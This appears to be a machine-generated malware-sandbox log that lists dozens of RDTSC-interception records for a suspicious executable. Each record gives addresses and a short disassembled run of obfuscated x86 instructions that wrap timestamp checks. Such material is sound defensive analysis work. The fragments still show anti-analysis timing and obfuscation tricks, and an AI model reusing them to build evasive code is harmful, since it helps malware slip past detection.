Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F59394 second address: F59398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5A1FF second address: F5A2C1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD4CB4B576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c call 00007FAD4CB4B586h 0x00000011 jmp 00007FAD4CB4B589h 0x00000016 pop edi 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FAD4CB4B578h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 mov dword ptr [ebp+124595E7h], eax 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 cmc 0x00000046 mov eax, dword ptr [ebp+122D0F8Dh] 0x0000004c mov bx, di 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ecx 0x00000054 call 00007FAD4CB4B578h 0x00000059 pop ecx 0x0000005a mov dword ptr [esp+04h], ecx 0x0000005e add dword ptr [esp+04h], 0000001Dh 0x00000066 inc ecx 0x00000067 push ecx 0x00000068 ret 0x00000069 pop ecx 0x0000006a ret 0x0000006b jo 00007FAD4CB4B57Ch 0x00000071 adc edi, 44879CF3h 0x00000077 xor bh, 00000077h 0x0000007a push eax 0x0000007b jns 00007FAD4CB4B584h 0x00000081 push eax 0x00000082 push edx 0x00000083 jnp 00007FAD4CB4B576h 0x00000089 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F090 second address: F5F095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F095 second address: F5F0B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB4B57Eh 0x00000008 jg 00007FAD4CB4B576h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007FAD4CB4B576h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F0B9 second address: F5F0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5D346 second address: F5D36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FAD4CB4B585h 0x0000000b jmp 00007FAD4CB4B57Fh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007FAD4CB4B578h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5E295 second address: F5E299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F0BD second address: F5F0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5E299 second address: F5E29D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F0C7 second address: F5F0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F2BB second address: F5F2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007FAD4CB7BFFCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F2C8 second address: F5F2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F601D3 second address: F601D9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F61ED5 second address: F61F59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FAD4CB4B586h 0x0000000c nop 0x0000000d sub dword ptr [ebp+122D2E6Dh], ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FAD4CB4B578h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FAD4CB4B578h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b jmp 00007FAD4CB4B580h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push ecx 0x00000054 jnl 00007FAD4CB4B576h 0x0000005a pop ecx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6207F second address: F6208B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6208B second address: F62091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F69891 second address: F698A9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAD4CB7BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007FAD4CB7BFFEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F698A9 second address: F698AE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6D0F9 second address: F6D111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7C004h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6C83B second address: F6C840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CB20 second address: F6CB28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CB28 second address: F6CB2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CB2C second address: F6CB3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007FAD4CB7BFF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CC88 second address: F6CC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CC8C second address: F6CC92 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CC92 second address: F6CC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CC9B second address: F6CCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CCAB second address: F6CCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B588h 0x00000009 je 00007FAD4CB4B576h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F72819 second address: F72823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FAD4CB7BFF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78481 second address: F78485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78485 second address: F78498 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAD4CB7BFF6h 0x00000008 jo 00007FAD4CB7BFF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78498 second address: F7849E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7849E second address: F784AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78A62 second address: F78A68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78A68 second address: F78A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78BCF second address: F78BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78BD3 second address: F78BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAD4CB7C000h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78D7F second address: F78DB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FAD4CB4B586h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FAD4CB4B57Eh 0x00000013 jl 00007FAD4CB4B57Ch 0x00000019 jg 00007FAD4CB4B576h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78DB7 second address: F78DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7900F second address: F79019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAD4CB4B576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F79019 second address: F7901F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7901F second address: F79044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FAD4CB4B578h 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAD4CB4B57Bh 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F795B7 second address: F795C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F0C222 second address: F0C23E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FAD4CB4B584h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F0C23E second address: F0C248 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAD4CB7BFFEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F0C248 second address: F0C281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007FAD4CB4B586h 0x0000000c jmp 00007FAD4CB4B57Eh 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jbe 00007FAD4CB4B576h 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 push ebx 0x00000023 push edx 0x00000024 pop edx 0x00000025 jo 00007FAD4CB4B576h 0x0000002b pop ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E5A4 second address: F7E5A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E70A second address: F7E70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EAE3 second address: F7EAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EC4B second address: F7EC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EC4F second address: F7EC7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAD4CB7C006h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EC7E second address: F7EC8A instructions: 0x00000000 rdtsc 0x00000002 js 00007FAD4CB4B576h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EC8A second address: F7EC8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EE03 second address: F7EE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EE0E second address: F7EE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7EE12 second address: F7EE16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7F0CE second address: F7F0D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7F0D2 second address: F7F0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jl 00007FAD4CB4B576h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F12BF7 second address: F12BFD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F12BFD second address: F12C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F12C03 second address: F12C0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E300 second address: F7E306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E306 second address: F7E30C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E30C second address: F7E315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E315 second address: F7E338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7C008h 0x00000009 jne 00007FAD4CB7BFF6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E338 second address: F7E33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E33E second address: F7E342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F7E342 second address: F7E351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FAD4CB4B576h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F842EF second address: F84306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a jmp 00007FAD4CB7BFFBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84306 second address: F8430B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F845E1 second address: F845EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F845EB second address: F845EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F848CF second address: F848DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAD4CB7BFF6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84A73 second address: F84A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B586h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FAD4CB4B576h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F83FBD second address: F83FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84CFC second address: F84D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAD4CB4B57Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84FBF second address: F84FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84FC3 second address: F84FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAD4CB4B576h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84FCF second address: F84FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84FD7 second address: F84FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84FDB second address: F84FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F84FE1 second address: F85004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FAD4CB4B57Dh 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007FAD4CB4B597h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F89122 second address: F89128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8D63E second address: F8D648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAD4CB4B576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8D648 second address: F8D651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8D651 second address: F8D65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F49928 second address: F33BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAD4CB7BFF6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d jmp 00007FAD4CB7BFFDh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FAD4CB7BFF8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D3249h], edx 0x00000033 call dword ptr [ebp+122D34F8h] 0x00000039 pushad 0x0000003a pushad 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d jp 00007FAD4CB7BFF6h 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F49ABA second address: F49ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
